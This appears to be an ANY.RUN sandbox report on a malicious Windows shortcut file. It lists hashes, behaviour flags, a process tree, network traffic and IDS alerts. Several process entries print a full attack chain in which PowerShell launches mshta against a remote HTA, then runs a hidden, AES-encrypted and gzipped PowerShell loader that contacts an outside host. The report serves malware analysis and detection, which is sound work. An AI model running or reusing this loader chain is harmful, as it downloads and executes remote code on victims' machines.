File name:

ITEMS -98765456.lnk

Full analysis: https://app.any.run/tasks/5a51d459-6caa-47dd-9b27-715ca2ec92bb
Verdict: Malicious activity
Analysis date: December 26, 2023, 05:55:18
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
MD5:

8D35E46911450C731F76F311BAAD7EF0

SHA1:

AE1D21E7C501CDE5631971A39349B4A18CB52A7F

SHA256:

1BF287BAF71F2A0872005E73399685DF6B3A2B27CB2F27511DEB4BDF566FBE67

SSDEEP:

12:8eUm/3BVSXvk44X3ojsqzKtnWNYyW+UcCsvXhrelOG5zbdpYrn1IlI5u9bOVn1IJ:8s/BHYVKVW+r+/CWtYOodd79dsHmBn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 3604)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 3604)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4112)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5340)
      • mshta.exe (PID: 3604)

    • Powershell scripting: start process

      • mshta.exe (PID: 3604)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4112)

    • Suspicious use of symmetric encryption in PowerShell

      • cmd.exe (PID: 5340)
      • mshta.exe (PID: 3604)

    • Access the System.Security .NET namespace (SCRIPT)

      • mshta.exe (PID: 3604)

    • Reads the Internet Settings

      • powershell.exe (PID: 4112)
      • mshta.exe (PID: 3604)
      • powershell.exe (PID: 5936)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 3604)

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 3604)
      • cmd.exe (PID: 5340)

    • Unusual connection from system programs

      • powershell.exe (PID: 5936)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 5936)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 3604)

    • Checks proxy server information

      • mshta.exe (PID: 3604)
      • powershell.exe (PID: 5936)

    • Checks supported languages

      • acrobat_sl.exe (PID: 2432)

    • Application launched itself

      • Acrobat.exe (PID: 5248)
      • AcroCEF.exe (PID: 3676)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 13
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
Description: line
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta')
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
123
Monitored processes
25
Malicious processes
1
Suspicious processes
4

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs adobearm.exe acrobat_sl.exe no specs acrocef.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1768"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2596\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
3604"C:\Windows\System32\mshta.exe" http://thanhancompany.com/ta/line.htaC:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
4112"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - }C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1672\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
5340"C:\Windows\system32\cmd.exe" /c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3876\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
4288powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5936powershell - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5248"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\admin\AppData\Roaming\blank.pdf"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
powershell.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
MEDIUM
Description:
Adobe Acrobat
Version:
22.3.20314.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrobat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
Total events
34 002
Read events
33 943
Write events
59
Delete events
0

Modification events

(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3604) mshta.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4112) powershell.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
1
Suspicious files
193
Text files
26
Unknown types
0

Dropped files

PID
Process
Filename
Type
5936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aknra21h.4im.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4112powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g1ql5mxj.iws.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qgisjhmd.4dh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eo3v5mve.xov.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NRBDW7BK27FE834PBTVI.tempbinary
MD5:677A49DC085EDD7387ECB03E135ADBB5
SHA256:E40BA42416E477828DCA40BE4DC0994369DD833111064982C9011BE914E98B19
5740Acrobat.exeC:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalbinary
MD5:693CD8A0C3142CF9696FDD8B62B4B854
SHA256:DA71C5AA40F4E46E44DDA53FBC305059C00CF35F11C42A2E3A86AE5FF1643A28
4288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m0ghyftm.pfi.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5936powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p55xjyaw.bgn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5740Acrobat.exeC:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txttext
MD5:E8A0E814D14CB38706064C3AC221964E
SHA256:77C1E1313CF8CBA6916CA38376F7FDD686904BC1A7E82BF915C3A021A7CE43B4
1768powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ctji1hnk.1my.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
33
DNS requests
19
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3604
mshta.exe
GET
200
192.185.191.127:80
http://thanhancompany.com/ta/line.hta
unknown
html
55.6 Kb
2476
AdobeARM.exe
GET
200
23.48.23.54:80
http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt
unknown
text
4 b
2476
AdobeARM.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEARSlvj82CmnXclClPWkFaQ%3D
unknown
binary
727 b
2476
AdobeARM.exe
GET
200
23.48.23.54:80
http://acroipm2.adobe.com/assets/Owner/arm/2023/12/OwnerAPI/Rdr.txt
unknown
text
4 b
5248
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAWz1NCckkaDRqU%2FRpuMnaA%3D
unknown
binary
471 b
1412
svchost.exe
GET
200
2.21.20.140:80
http://www.msftconnecttest.com/connecttest.txt
unknown
text
22 b
3884
smartscreen.exe
GET
200
93.184.221.240:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?13b41378fce6cd72
unknown
compressed
4.66 Kb
3884
smartscreen.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
binary
471 b
2476
AdobeARM.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
binary
471 b
5248
Acrobat.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
binary
471 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4588
svchost.exe
239.255.255.250:1900
unknown
2864
svchost.exe
20.73.194.208:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
3884
smartscreen.exe
20.31.251.109:443
checkappexec.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
1412
svchost.exe
2.21.20.155:80
Akamai International B.V.
DE
unknown
3884
smartscreen.exe
93.184.221.240:80
ctldl.windowsupdate.com
EDGECAST
GB
unknown
3884
smartscreen.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown
3604
mshta.exe
192.185.191.127:80
thanhancompany.com
UNIFIEDLAYER-AS-1
US
unknown
5944
svchost.exe
184.30.17.174:443
fs.microsoft.com
AKAMAI-AS
DE
unknown
6112
OfficeC2RClient.exe
52.109.89.18:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
unknown
5936
powershell.exe
167.99.136.52:443
mag.wcoomd.org
DIGITALOCEAN-ASN
DE
unknown

DNS requests

Domain
IP
Reputation
checkappexec.microsoft.com
  • 20.31.251.109
unknown
ctldl.windowsupdate.com
  • 93.184.221.240
unknown
ocsp.digicert.com
  • 192.229.221.95
unknown
thanhancompany.com
  • 192.185.191.127
unknown
mag.wcoomd.org
  • 167.99.136.52
unknown
hiqsolution.com
  • 217.199.187.191
unknown
cc-api-data.adobe.io
  • 54.195.71.107
  • 34.250.67.152
  • 54.194.243.238
unknown
geo2.adobe.com
  • 23.35.236.137
unknown
p13n.adobe.io
  • 52.22.41.97
  • 52.6.155.20
  • 3.219.243.226
  • 3.233.129.217
unknown
login.live.com
  • 20.190.159.64
  • 40.126.31.71
  • 20.190.159.75
  • 20.190.159.73
  • 20.190.159.23
  • 20.190.159.71
  • 20.190.159.0
  • 40.126.31.73
unknown

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
Attempted User Privilege Gain
ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
Misc activity
ET INFO Microsoft Connection Test
No debug info
Interactive malware hunting service ANY.RUN
